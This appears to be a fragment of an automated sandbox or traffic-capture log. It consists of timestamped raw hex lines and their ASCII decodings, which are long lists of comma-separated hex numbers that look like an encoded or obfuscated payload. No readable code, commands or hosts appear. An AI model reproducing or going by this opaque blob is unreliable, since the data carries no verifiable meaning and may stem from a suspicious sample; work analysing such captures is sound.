                                                    Data Ascii: c,e5,78,ed,85,4c,77,a4,71,133,ee,132,133,131,cc,119,14b,75,15a,157,145,c1,7e,148,12b,c7,11f,14d,16b,d5,97,13f,e1,9f,13f,b2,c5,91,148,ab,155,93,165,142,133,b5,105,59,72,10b,135,dd,118,ac,44,fb,88,13b,b4,116,70,d5,97,157,13f,5c,152,f9,bb,c1,160,5a,e2,7a,102
                                                    2023-11-04 00:30:16 UTC41INData Raw: 35 2c 31 33 35 2c 66 62 2c 39 38 2c 31 34 37 2c 62 63 2c 39 33 2c 37 34 2c 64 35 2c 39 34 2c 38 33 2c 64 66 2c 39 66 2c 31 36 33 2c 65 64 2c 31 31 64 2c 61 31 2c 31 33 36 2c 35 65 2c 36 64 2c 31 31 37 2c 31 34 33 2c 31 30 66 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 63 36 2c 31 33 62 2c 35 35 2c 62 38 2c 36 63 2c 64 39 2c 39 66 2c 31 35 66 2c 31 33 63 2c 31 32 36 2c 61 31 2c 36 32 2c 33 38 2c 65 35 2c 64 34 2c 31 31 64 2c 62 34 2c 34 62 2c 31 30 30 2c 38 38 2c 31 32 34 2c 65 62 2c 61 39 2c 31 31 34 2c 61 61 2c 35 35 2c 31 34 64 2c 66 36 2c 34 36 2c 33 38 2c 33 39 2c 66 39 2c 38 38 2c 31 34 37 2c 62 63 2c 39 62 2c 31 36 34 2c 39 64 2c 64 64 2c 62 38 2c 35 63 2c
                                                    Data Ascii: 5,135,fb,98,147,bc,93,74,d5,94,83,df,9f,163,ed,11d,a1,136,5e,6d,117,143,10f,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,c6,13b,55,b8,6c,d9,9f,15f,13c,126,a1,62,38,e5,d4,11d,b4,4b,100,88,124,eb,a9,114,aa,55,14d,f6,46,38,39,f9,88,147,bc,9b,164,9d,dd,b8,5c,
                                                    2023-11-04 00:30:16 UTC43INData Raw: 39 35 2c 31 34 33 2c 37 34 2c 31 32 30 2c 62 39 2c 61 63 2c 34 33 2c 34 66 2c 62 61 2c 39 33 2c 31 36 34 2c 64 37 2c 39 37 2c 31 36 33 2c 64 66 2c 61 37 2c 36 66 2c 39 64 2c 38 30 2c 35 30 2c 65 37 2c 36 62 2c 66 38 2c 61 30 2c 31 36 66 2c 63 65 2c 37 36 2c 33 61 2c 63 63 2c 39 65 2c 36 62 2c 65 30 2c 37 39 2c 65 30 2c 63 66 2c 38 64 2c 31 32 35 2c 31 35 62 2c 34 61 2c 31 31 36 2c 37 36 2c 31 33 61 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 64 66 2c 39 66 2c 31 35 33 2c 65 64 2c 31 31 64 2c 61 31 2c 31 33 36 2c 35 65 2c 36 64 2c 31 31 37 2c 31 34 33 2c 31 30 66 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 31 33 37 2c 31 31 38 2c 37 31 2c 36 63 2c 34 63 2c 64
                                                    Data Ascii: 95,143,74,120,b9,ac,43,4f,ba,93,164,d7,97,163,df,a7,6f,9d,80,50,e7,6b,f8,a0,16f,ce,76,3a,cc,9e,6b,e0,79,e0,cf,8d,125,15b,4a,116,76,13a,6c,4c,52,6b,df,9f,153,ed,11d,a1,136,5e,6d,117,143,10f,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,94,137,118,71,6c,4c,d
                                                    2023-11-04 00:30:16 UTC44INData Raw: 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 66 37 2c 39 31 2c 35 65 2c 62 62 2c 64 66 2c 61 37 2c 36 66 2c 62 33 2c 63 33 2c 39 39 2c 31 37 30 2c 65 35 2c 36 66 2c 64 36 2c 63 34 2c 31 33 66 2c 62 66 2c 38 32 2c 36 31 2c 31 35 30 2c 31 33 35 2c 65 30 2c 31 34 61 2c 62 35 2c 31 30 38 2c 34 30 2c 33 39 2c 31 33 63 2c 31 30 66 2c 31 31 62 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 65 65 2c 31 33 37 2c 31 31 33 2c 34 33 2c 33 34 2c 33 32 2c 31 30 38 2c 64 36 2c 63 62 2c 31 35 34 2c 31 36 34 2c 31 35 37 2c 34 36
                                                    Data Ascii: ,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,94,d8,7e,14a,f7,91,5e,bb,df,a7,6f,b3,c3,99,170,e5,6f,d6,c4,13f,bf,82,61,150,135,e0,14a,b5,108,40,39,13c,10f,11b,fd,11a,138,118,11e,137,120,126,133,12e,104,99,ff,146,ee,137,113,43,34,32,108,d6,cb,154,164,157,46
                                                    2023-11-04 00:30:16 UTC45INData Raw: 32 38 2c 38 32 2c 31 32 30 2c 35 30 2c 31 35 38 2c 31 35 39 2c 31 36 63 2c 64 36 2c 63 34 2c 31 33 66 2c 62 37 2c 66 33 2c 34 35 2c 31 33 39 2c 36 34 2c 31 33 39 2c 31 36 34 2c 31 35 37 2c 64 31 2c 38 35 2c 31 33 35 2c 31 35 38 2c 38 30 2c 38 35 2c 33 31 2c 34 65 2c 66 37 2c 31 33 31 2c 61 66 2c 31 32 65 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66 2c 62 66 2c 37 37 2c 31 33 64 2c 64 63 2c 36 62 2c 64 38 2c 31 32 36 2c 37 30 2c 39 37 2c 63 33 2c 38 36 2c 37 38 2c 31 32 62 2c 36 37 2c 31 31 65 2c 31 34 64 2c 31 36 62 2c 64 37 2c 39 37 2c 37 33 2c 64 66 2c 31 33 66 2c 63 34 2c 31 32 34 2c 33 63 2c 34 34 2c 31 34 30 2c 31 32 36 2c 31 33 39 2c 31 31 37 2c 31 34 33 2c 31 30 66
                                                    Data Ascii: 28,82,120,50,158,159,16c,d6,c4,13f,b7,f3,45,139,64,139,164,157,d1,85,135,158,80,85,31,4e,f7,131,af,12e,120,126,133,12e,104,99,ff,146,be,d4,c4,13f,bf,77,13d,dc,6b,d8,126,70,97,c3,86,78,12b,67,11e,14d,16b,d7,97,73,df,13f,c4,124,3c,44,140,126,139,117,143,10f
                                                    2023-11-04 00:30:16 UTC47INData Raw: 38 39 2c 63 34 2c 62 64 2c 35 37 2c 31 33 37 2c 31 30 38 2c 31 33 32 2c 31 36 62 2c 31 34 62 2c 61 32 2c 31 35 33 2c 31 33 35 2c 37 33 2c 36 37 2c 36 32 2c 62 62 2c 31 30 38 2c 37 38 2c 65 33 2c 62 32 2c 31 34 37 2c 31 30 34 2c 39 30 2c 31 30 63 2c 31 31 61 2c 35 34 2c 31 33 35 2c 31 36 32 2c 31 35 34 2c 66 32 2c 61 35 2c 31 32 32 2c 31 32 30 2c 64 34 2c 31 36 65 2c 31 34 32 2c 31 34 65 2c 34 30 2c 31 30 34 2c 63 31 2c 36 38 2c 64 37 2c 31 33 64 2c 63 38 2c 37 39 2c 66 34 2c 61 37 2c 66 34 2c 39 34 2c 66 66 2c 61 37 2c 31 36 39 2c 31 33 33 2c 31 35 65 2c 35 36 2c 33 34 2c 33 32 2c 39 31 2c 64 65 2c 62 30 2c 31 33 31 2c 31 34 64 2c 36 36 2c 34 65 2c 33 38 2c 33 39 2c 66 64 2c 39 30 2c 31 30 62 2c 31 31 39 2c 38 34 2c 31 34 65 2c 31 34 62 2c 31 35 31 2c 31
                                                    Data Ascii: 89,c4,bd,57,137,108,132,16b,14b,a2,153,135,73,67,62,bb,108,78,e3,b2,147,104,90,10c,11a,54,135,162,154,f2,a5,122,120,d4,16e,142,14e,40,104,c1,68,d7,13d,c8,79,f4,a7,f4,94,ff,a7,169,133,15e,56,34,32,91,de,b0,131,14d,66,4e,38,39,fd,90,10b,119,84,14e,14b,151,1
                                                    2023-11-04 00:30:16 UTC48INData Raw: 2c 36 35 2c 35 38 2c 63 39 2c 66 63 2c 34 39 2c 63 30 2c 61 64 2c 38 66 2c 62 65 2c 39 33 2c 31 32 34 2c 39 63 2c 31 33 61 2c 64 66 2c 62 32 2c 35 61 2c 36 37 2c 65 35 2c 66 63 2c 35 34 2c 63 34 2c 65 37 2c 62 61 2c 31 30 33 2c 63 38 2c 35 32 2c 65 61 2c 38 37 2c 35 39 2c 61 33 2c 65 65 2c 39 61 2c 37 39 2c 61 38 2c 64 31 2c 38 35 2c 34 39 2c 63 31 2c 63 65 2c 61 34 2c 33 64 2c 61 30 2c 66 37 2c 39 31 2c 35 61 2c 62 62 2c 64 66 2c 61 37 2c 31 31 33 2c 62 33 2c 31 32 30 2c 66 30 2c 38 32 2c 35 61 2c 36 64 2c 63 65 2c 31 33 62 2c 36 33 2c 62 66 2c 37 37 2c 34 39 2c 64 63 2c 31 34 38 2c 62 32 2c 31 32 37 2c 37 30 2c 34 36 2c 38 64 2c 63 34 2c 31 35 63 2c 63 36 2c 31 33 62 2c 38 35 2c 64 37 2c 62 39 2c 66 38 2c 31 31 39 2c 62 30 2c 31 35 30 2c 39 61 2c 36 37
                                                    Data Ascii: ,65,58,c9,fc,49,c0,ad,8f,be,93,124,9c,13a,df,b2,5a,67,e5,fc,54,c4,e7,ba,103,c8,52,ea,87,59,a3,ee,9a,79,a8,d1,85,49,c1,ce,a4,3d,a0,f7,91,5a,bb,df,a7,113,b3,120,f0,82,5a,6d,ce,13b,63,bf,77,49,dc,148,b2,127,70,46,8d,c4,15c,c6,13b,85,d7,b9,f8,119,b0,150,9a,67
                                                    2023-11-04 00:30:16 UTC49INData Raw: 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 65 65 2c 31 33 37 2c 31 31 37 2c 34 33 2c 33 34 2c 33 32 2c 63 61 2c 64 65 2c 63 66 2c 31 35 34 2c 31 36 34 2c 31 35 37 2c 31 30 64 2c 37 64 2c 31 32 39 2c 64 63 2c 34 33 2c 34 66 2c 33 31 2c 64 39 2c 62 39 2c 36 30 2c 31 33 61 2c 36 64 2c 35 36 2c 35 61 2c 36 37 2c 65 37 2c 66 38 2c 63 33 2c 38 66 2c 65 35 2c 62 61 2c 35 66 2c 31 35 66 2c 66 39 2c 31 32 32 2c 31 33 31 2c 31 34 30 2c 37 36 2c 36 33 2c 37 35 2c 36 35 2c 35 38 2c 62 62 2c 34 34 2c 31 30 30 2c 66 35 2c 61 62 2c 31 34 65 2c 31 33 30 2c 31 34 64 2c 37 32 2c 34 63 2c 35 32 2c 36 62 2c 31 33 66 2c 36 38 2c 66 32 2c 61 66 2c 34 63 2c 31 32 63 2c 31 34 66 2c 35 62 2c 36
                                                    Data Ascii: ,118,11e,137,120,126,133,12e,104,99,ff,146,ee,137,117,43,34,32,ca,de,cf,154,164,157,10d,7d,129,dc,43,4f,31,d9,b9,60,13a,6d,56,5a,67,e7,f8,c3,8f,e5,ba,5f,15f,f9,122,131,140,76,63,75,65,58,bb,44,100,f5,ab,14e,130,14d,72,4c,52,6b,13f,68,f2,af,4c,12c,14f,5b,6
                                                    2023-11-04 00:30:16 UTC51INData Raw: 34 2c 31 36 34 2c 31 35 37 2c 63 62 2c 66 38 2c 61 64 2c 37 38 2c 31 32 30 2c 39 34 2c 34 64 2c 31 32 37 2c 31 34 63 2c 31 32 39 2c 61 66 2c 38 37 2c 64 37 2c 31 34 36 2c 36 66 2c 31 33 66 2c 37 64 2c 36 30 2c 31 35 31 2c 37 36 2c 39 31 2c 64 36 2c 31 30 34 2c 62 37 2c 31 33 33 2c 31 33 31 2c 31 34 30 2c 61 32 2c 65 65 2c 61 32 2c 37 39 2c 31 34 30 2c 37 33 2c 31 32 35 2c 31 33 38 2c 31 36 66 2c 39 33 2c 62 39 2c 33 31 2c 64 62 2c 31 30 31 2c 63 34 2c 31 35 31 2c 31 36 61 2c 31 35 33 2c 61 63 2c 66 32 2c 65 37 2c 61 34 2c 31 34 33 2c 31 37 33 2c 31 35 39 2c 62 64 2c 31 33 33 2c 64 65 2c 34 36 2c 33 34 2c 33 32 2c 63 34 2c 31 31 35 2c 37 33 2c 61 35 2c 63 66 2c 63 34 2c 64 33 2c 38 35 2c 62 39 2c 63 31 2c 31 32 62 2c 31 34 39 2c 38 62 2c 34 65 2c 36 63 2c
                                                    Data Ascii: 4,164,157,cb,f8,ad,78,120,94,4d,127,14c,129,af,87,d7,146,6f,13f,7d,60,151,76,91,d6,104,b7,133,131,140,a2,ee,a2,79,140,73,125,138,16f,93,b9,31,db,101,c4,151,16a,153,ac,f2,e7,a4,143,173,159,bd,133,de,46,34,32,c4,115,73,a5,cf,c4,d3,85,b9,c1,12b,149,8b,4e,6c,
                                                    2023-11-04 00:30:16 UTC52INData Raw: 33 2c 64 66 2c 31 33 66 2c 62 66 2c 37 66 2c 31 32 30 2c 37 39 2c 34 65 2c 31 31 61 2c 31 33 31 2c 31 34 30 2c 62 32 2c 38 31 2c 31 34 33 2c 34 66 2c 63 33 2c 37 65 2c 31 36 63 2c 63 36 2c 31 30 66 2c 33 62 2c 64 37 2c 62 31 2c 31 34 38 2c 31 32 66 2c 62 30 2c 37 30 2c 31 33 36 2c 38 34 2c 31 32 61 2c 31 33 37 2c 38 35 2c 37 34 2c 31 33 39 2c 31 34 64 2c 31 34 31 2c 31 33 62 2c 34 34 2c 61 39 2c 34 39 2c 63 32 2c 63 65 2c 31 35 66 2c 64 64 2c 37 38 2c 35 38 2c 34 36 2c 61 62 2c 34 37 2c 31 34 64 2c 38 38 2c 36 62 2c 31 30 64 2c 38 33 2c 31 32 63 2c 31 34 62 2c 39 33 2c 36 62 2c 31 33 31 2c 62 37 2c 38 33 2c 31 34 64 2c 31 30 38 2c 31 32 31 2c 62 39 2c 37 36 2c 31 34 39 2c 36 38 2c 31 35 37 2c 31 34 31 2c 37 35 2c 33 32 2c 31 32 30 2c 31 33 31 2c 31 35 39
                                                    Data Ascii: 3,df,13f,bf,7f,120,79,4e,11a,131,140,b2,81,143,4f,c3,7e,16c,c6,10f,3b,d7,b1,148,12f,b0,70,136,84,12a,137,85,74,139,14d,141,13b,44,a9,49,c2,ce,15f,dd,78,58,46,ab,47,14d,88,6b,10d,83,12c,14b,93,6b,131,b7,83,14d,108,121,b9,76,149,68,157,141,75,32,120,131,159
                                                    2023-11-04 00:30:16 UTC53INData Raw: 35 2c 35 61 2c 36 37 2c 36 32 2c 63 33 2c 38 39 2c 37 63 2c 64 64 2c 31 34 64 2c 34 63 2c 65 62 2c 34 66 2c 62 66 2c 37 66 2c 31 33 64 2c 61 32 2c 31 34 62 2c 31 34 63 2c 61 35 2c 35 38 2c 34 36 2c 62 62 2c 66 64 2c 37 34 2c 63 65 2c 39 34 2c 31 32 64 2c 64 39 2c 31 35 31 2c 61 39 2c 31 31 34 2c 36 66 2c 35 34 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66 2c 62 66 2c 37 37 2c 31 33 64 2c 31 31 38 2c 36 33 2c 63 64 2c 31 36 34 2c 39 39 2c 34 36 2c 63 33 2c 38 36 2c 31 36 63 2c 31 32 62 2c 39 37 2c 31 32 38 2c 31 34 64 2c 31 36 62 2c 64 37 2c 31 33 37 2c 63 38 2c 31 31 37 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66
                                                    Data Ascii: 5,5a,67,62,c3,89,7c,dd,14d,4c,eb,4f,bf,7f,13d,a2,14b,14c,a5,58,46,bb,fd,74,ce,94,12d,d9,151,a9,114,6f,54,126,133,12e,104,99,ff,146,be,d4,c4,13f,bf,77,13d,118,63,cd,164,99,46,c3,86,16c,12b,97,128,14d,16b,d7,137,c8,117,126,133,12e,104,99,ff,146,be,d4,c4,13f
                                                    2023-11-04 00:30:16 UTC58INData Raw: 31 33 38 2c 31 36 66 2c 31 34 32 2c 39 66 2c 62 63 2c 39 62 2c 37 34 2c 39 64 2c 31 33 61 2c 31 33 64 2c 35 64 2c 35 61 2c 36 37 2c 65 35 2c 66 63 2c 36 30 2c 66 66 2c 36 61 2c 66 38 2c 38 62 2c 37 62 2c 63 63 2c 38 39 2c 34 32 2c 63 61 2c 39 36 2c 37 37 2c 65 30 2c 62 32 2c 37 63 2c 39 37 2c 34 37 2c 65 66 2c 63 35 2c 31 33 61 2c 61 31 2c 62 63 2c 39 33 2c 38 30 2c 39 63 2c 64 64 2c 62 38 2c 36 34 2c 61 62 2c 66 34 2c 66 37 2c 61 30 2c 31 34 33 2c 31 37 33 2c 31 35 39 2c 62 66 2c 64 36 2c 62 63 2c 34 62 2c 38 34 2c 31 31 61 2c 38 34 2c 35 37 2c 36 33 2c 35 35 2c 65 38 2c 31 31 63 2c 35 65 2c 63 33 2c 34 31 2c 66 62 2c 39 33 2c 35 33 2c 62 61 2c 39 62 2c 37 63 2c 64 35 2c 61 37 2c 37 66 2c 62 65 2c 35 62 2c 66 32 2c 61 66 2c 31 33 30 2c 31 32 63 2c 31 33
                                                    Data Ascii: 138,16f,142,9f,bc,9b,74,9d,13a,13d,5d,5a,67,e5,fc,60,ff,6a,f8,8b,7b,cc,89,42,ca,96,77,e0,b2,7c,97,47,ef,c5,13a,a1,bc,93,80,9c,dd,b8,64,ab,f4,f7,a0,143,173,159,bf,d6,bc,4b,84,11a,84,57,63,55,e8,11c,5e,c3,41,fb,93,53,ba,9b,7c,d5,a7,7f,be,5b,f2,af,130,12c,13
                                                    2023-11-04 00:30:16 UTC62INData Raw: 2c 36 35 2c 62 35 2c 65 35 2c 39 33 2c 66 38 2c 38 61 2c 66 62 2c 39 38 2c 35 37 2c 38 33 2c 31 33 36 2c 63 31 2c 34 64 2c 35 32 2c 36 62 2c 64 37 2c 31 31 65 2c 37 66 2c 65 64 2c 34 30 2c 63 66 2c 63 34 2c 35 65 2c 66 36 2c 39 38 2c 38 37 2c 63 63 2c 38 39 2c 34 36 2c 31 30 38 2c 39 36 2c 31 35 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 31 32 33 2c 62 32 2c 66 31 2c 63 30 2c 31 34 62 2c 33 31 2c 34 66 2c 36 63 2c 34 63 2c 63 37 2c 64 62 2c 64 66 2c 39 66 2c 31 35 62 2c 62 32 2c 63 33 2c 39 31 2c 39 34 2c 61 62 2c 66 38 2c 61 30 2c 38 62 2c 39 35 2c 62 66 2c 37 37 2c 35 31 2c 61 31 2c 66 30 2c 61 32 2c 31 31 64 2c 61 39 2c 64 31 2c 38 64 2c 34 31 2c 63 32 2c 31 32 62 2c 35 37 2c 33 35 2c 34 65 2c 36 63 2c 63 66 2c 31 31 36 2c 38 33 2c 64 66 2c 36 32 2c 66
                                                    Data Ascii: ,65,b5,e5,93,f8,8a,fb,98,57,83,136,c1,4d,52,6b,d7,11e,7f,ed,40,cf,c4,5e,f6,98,87,cc,89,46,108,96,153,55,65,58,46,123,b2,f1,c0,14b,31,4f,6c,4c,c7,db,df,9f,15b,b2,c3,91,94,ab,f8,a0,8b,95,bf,77,51,a1,f0,a2,11d,a9,d1,8d,41,c2,12b,57,35,4e,6c,cf,116,83,df,62,f
                                                    2023-11-04 00:30:16 UTC66INData Raw: 63 2c 63 63 2c 61 34 2c 31 31 35 2c 64 39 2c 62 31 2c 31 33 30 2c 64 62 2c 62 30 2c 31 34 63 2c 65 35 2c 62 34 2c 31 35 61 2c 38 39 2c 63 66 2c 63 39 2c 37 32 2c 62 66 2c 64 36 2c 62 63 2c 35 37 2c 38 34 2c 62 64 2c 38 65 2c 36 31 2c 62 34 2c 65 32 2c 62 61 2c 31 34 38 2c 39 38 2c 63 33 2c 37 65 2c 37 38 2c 39 33 2c 31 33 37 2c 35 38 2c 31 34 64 2c 31 36 62 2c 31 34 62 2c 64 35 2c 31 32 66 2c 36 63 2c 65 35 2c 36 66 2c 65 64 2c 38 38 2c 34 38 2c 66 64 2c 61 37 2c 37 64 2c 64 34 2c 63 63 2c 35 37 2c 62 66 2c 37 37 2c 35 39 2c 35 34 2c 61 38 2c 31 34 64 2c 65 65 2c 39 64 2c 35 65 2c 63 33 2c 38 36 2c 38 63 2c 36 65 2c 39 63 2c 31 32 39 2c 64 37 2c 62 39 2c 36 38 2c 63 37 2c 36 64 2c 31 33 66 2c 39 31 2c 37 36 2c 31 32 30 2c 38 64 2c 36 34 2c 66 39 2c 31 32
                                                    Data Ascii: c,cc,a4,115,d9,b1,130,db,b0,14c,e5,b4,15a,89,cf,c9,72,bf,d6,bc,57,84,bd,8e,61,b4,e2,ba,148,98,c3,7e,78,93,137,58,14d,16b,14b,d5,12f,6c,e5,6f,ed,88,48,fd,a7,7d,d4,cc,57,bf,77,59,54,a8,14d,ee,9d,5e,c3,86,8c,6e,9c,129,d7,b9,68,c7,6d,13f,91,76,120,8d,64,f9,12
                                                    2023-11-04 00:30:16 UTC68INData Raw: 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 66 30 2c 31 33 37 2c 39 62 2c 61 64 2c 33 34 2c 62 66 2c 38 65 2c 31 34 35 2c 31 34 62 2c 66 31 2c 37 66 2c 35 38 2c 34 36 2c 64 39 2c 39 64 2c 31 33 33 2c 38 61 2c 34 66 2c 62 61 2c 39 33 2c 31 35 63 2c 31 30 35 2c 62 65 2c 31 32 65 2c 39 62 2c 35 61 2c 31 34 66 2c 64 30 2c 31 31 38 2c 31 34 33 2c 31 37 33 2c 65 33 2c 62 32 2c 31 34 33 2c 31 30 32 2c 39 30 2c 31 32 63 2c 38 33 2c 63 63 2c 39 65 2c 36 62 2c 31 33 64 2c 31 33 34 2c 31 33 38 2c 31 34 35 2c 31 33 37 2c 63 32 2c 62 35 2c 31 33 66 2c 64 32 2c 61 65 2c 31 34 61 2c 36 63 2c 63 30 2c 35 34 2c 31 35 36 2c 62 39 2c 64 64 2c 65 34 2c 31 35 32 2c 33 38 2c 62 38 2c 37 63 2c 65 35 2c 63 32 2c 31 33 62 2c 31 30 30 2c 39 38 2c 31 33 30 2c 31 31 64 2c 39 38
                                                    Data Ascii: e,104,99,ff,146,f0,137,9b,ad,34,bf,8e,145,14b,f1,7f,58,46,d9,9d,133,8a,4f,ba,93,15c,105,be,12e,9b,5a,14f,d0,118,143,173,e3,b2,143,102,90,12c,83,cc,9e,6b,13d,134,138,145,137,c2,b5,13f,d2,ae,14a,6c,c0,54,156,b9,dd,e4,152,38,b8,7c,e5,c2,13b,100,98,130,11d,98
                                                    Data Ascii: ,d6,8b,ab,f4,a1,152,f2,c1,3c,7f,d3,62,e2,8e,132,43,34,32,c1,d4,15c,75,d8,72,119,123,c4,bd,13b,dc,7d,4f,70,143,125,8c,b0,ea,ab,160,41,b9,9a,e5,ba,53,98,5c,11f,51,c4,112,143,128,150,e3,93,130,c6,bc,44,53,128,121,8d,e8,e2,12f,54,5a,67,160,41,b9,7a,e5,ba,53,9
                                                    2023-11-04 00:30:16 UTC200INData Raw: 2c 66 36 2c 36 32 2c 65 37 2c 65 30 2c 36 33 2c 63 31 2c 38 32 2c 66 39 2c 31 32 33 2c 65 32 2c 36 35 2c 62 32 2c 36 30 2c 66 34 2c 66 39 2c 38 38 2c 35 31 2c 64 38 2c 36 37 2c 66 30 2c 61 35 2c 31 34 32 2c 37 33 2c 34 36 2c 61 30 2c 31 31 35 2c 39 36 2c 33 31 2c 63 33 2c 37 33 2c 63 66 2c 37 37 2c 31 32 62 2c 31 31 62 2c 61 31 2c 36 37 2c 36 32 2c 63 33 2c 39 31 2c 31 37 30 2c 65 33 2c 37 35 2c 64 38 2c 62 39 2c 34 37 2c 39 33 2c 39 30 2c 39 63 2c 31 31 61 2c 31 32 36 2c 62 64 2c 65 35 2c 31 35 35 2c 38 36 2c 33 38 2c 39 64 2c 31 36 66 2c 37 38 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 64 37 2c 39 36 2c 38 66 2c 36 34 2c 65 33 2c 64 33 2c 38 36 2c 34 38 2c 64 31 2c 65 30 2c 37 65 2c 37 64 2c 37 36 2c 31 35 37 2c 39 36 2c 38 61 2c 38 39 2c 65 32 2c 65 31 2c
                                                    Data Ascii: ,f6,62,e7,e0,63,c1,82,f9,123,e2,65,b2,60,f4,f9,88,51,d8,67,f0,a5,142,73,46,a0,115,96,31,c3,73,cf,77,12b,11b,a1,67,62,c3,91,170,e3,75,d8,b9,47,93,90,9c,11a,126,bd,e5,155,86,38,9d,16f,78,4f,31,4e,6c,d7,96,8f,64,e3,d3,86,48,d1,e0,7e,7d,76,157,96,8a,89,e2,e1,
                                                    2023-11-04 00:30:16 UTC204INData Raw: 61 33 2c 33 38 2c 31 30 62 2c 37 38 2c 37 65 2c 65 39 2c 31 33 63 2c 62 38 2c 34 33 2c 31 31 63 2c 39 35 2c 31 34 30 2c 31 35 30 2c 31 36 32 2c 64 38 2c 61 32 2c 36 63 2c 31 31 38 2c 37 66 2c 33 39 2c 37 30 2c 39 63 2c 63 33 2c 34 63 2c 62 36 2c 38 30 2c 31 31 65 2c 39 39 2c 36 62 2c 31 33 63 2c 36 61 2c 63 62 2c 36 32 2c 33 38 2c 39 64 2c 66 39 2c 31 31 61 2c 65 31 2c 35 37 2c 65 31 2c 34 33 2c 39 65 2c 33 34 2c 61 62 2c 35 31 2c 31 36 32 2c 36 61 2c 37 39 2c 31 32 61 2c 38 64 2c 33 38 2c 36 63 2c 31 33 30 2c 61 30 2c 31 31 32 2c 39 62 2c 36 36 2c 64 34 2c 66 63 2c 38 37 2c 61 64 2c 35 34 2c 31 34 32 2c 31 35 32 2c 31 35 63 2c 31 33 37 2c 31 34 33 2c 64 65 2c 36 32 2c 31 35 35 2c 31 33 38 2c 31 36 36 2c 31 34 32 2c 31 33 33 2c 38 62 2c 63 34 2c 62 36 2c
                                                    Data Ascii: a3,38,10b,78,7e,e9,13c,b8,43,11c,95,140,150,162,d8,a2,6c,118,7f,39,70,9c,c3,4c,b6,80,11e,99,6b,13c,6a,cb,62,38,9d,f9,11a,e1,57,e1,43,9e,34,ab,51,162,6a,79,12a,8d,38,6c,130,a0,112,9b,66,d4,fc,87,ad,54,142,152,15c,137,143,de,62,155,138,166,142,133,8b,c4,b6,
                                                    2023-11-04 00:30:16 UTC208INData Raw: 2c 39 66 2c 36 66 2c 63 30 2c 39 35 2c 31 30 37 2c 31 37 33 2c 36 66 2c 31 31 35 2c 31 33 62 2c 62 38 2c 34 33 2c 66 36 2c 33 36 2c 34 31 2c 64 63 2c 31 36 32 2c 61 62 2c 31 36 34 2c 38 64 2c 66 32 2c 65 65 2c 38 30 2c 37 30 2c 31 34 32 2c 36 34 2c 64 35 2c 31 33 65 2c 61 64 2c 34 63 2c 64 64 2c 31 35 62 2c 64 39 2c 31 35 30 2c 64 63 2c 37 64 2c 31 33 37 2c 37 39 2c 38 63 2c 31 32 35 2c 62 34 2c 34 62 2c 31 35 66 2c 61 38 2c 31 33 33 2c 31 33 31 2c 31 34 30 2c 61 61 2c 65 65 2c 31 34 35 2c 62 62 2c 31 35 37 2c 37 62 2c 65 34 2c 65 66 2c 62 37 2c 34 33 2c 31 34 65 2c 34 36 2c 66 61 2c 31 35 63 2c 38 64 2c 35 32 2c 66 36 2c 31 31 61 2c 62 38 2c 31 32 61 2c 31 30 33 2c 65 30 2c 66 61 2c 62 62 2c 35 61 2c 66 30 2c 31 34 33 2c 31 37 36 2c 62 37 2c 34 61 2c 38
                                                    Data Ascii: ,9f,6f,c0,95,107,173,6f,115,13b,b8,43,f6,36,41,dc,162,ab,164,8d,f2,ee,80,70,142,64,d5,13e,ad,4c,dd,15b,d9,150,dc,7d,137,79,8c,125,b4,4b,15f,a8,133,131,140,aa,ee,145,bb,157,7b,e4,ef,b7,43,14e,46,fa,15c,8d,52,f6,11a,b8,12a,103,e0,fa,bb,5a,f0,143,176,b7,4a,8
                                                    2023-11-04 00:30:16 UTC213INData Raw: 31 35 39 2c 31 36 63 2c 31 33 33 2c 66 66 2c 31 33 34 2c 31 33 33 2c 31 33 31 2c 31 30 34 2c 31 33 39 2c 31 34 66 2c 31 35 31 2c 31 36 34 2c 31 35 37 2c 64 31 2c 37 38 2c 62 35 2c 66 35 2c 31 30 33 2c 63 33 2c 33 33 2c 31 34 64 2c 31 33 63 2c 31 33 35 2c 31 30 36 2c 31 36 61 2c 31 35 33 2c 31 35 39 2c 64 31 2c 36 61 2c 61 30 2c 38 34 2c 61 61 2c 39 63 2c 36 64 2c 31 33 33 2c 39 61 2c 31 33 34 2c 31 33 33 2c 31 33 31 2c 31 34 30 2c 38 36 2c 38 37 2c 31 32 30 2c 61 63 2c 35 38 2c 31 32 65 2c 62 33 2c 31 33 33 2c 31 36 66 2c 31 34 32 2c 61 38 2c 62 36 2c 31 30 65 2c 65 30 2c 36 32 2c 64 35 2c 64 30 2c 31 35 30 2c 35 61 2c 31 36 36 2c 31 33 32 2c 31 32 33 2c 34 62 2c 61 37 2c 31 31 61 2c 61 64 2c 31 30 65 2c 31 30 32 2c 61 38 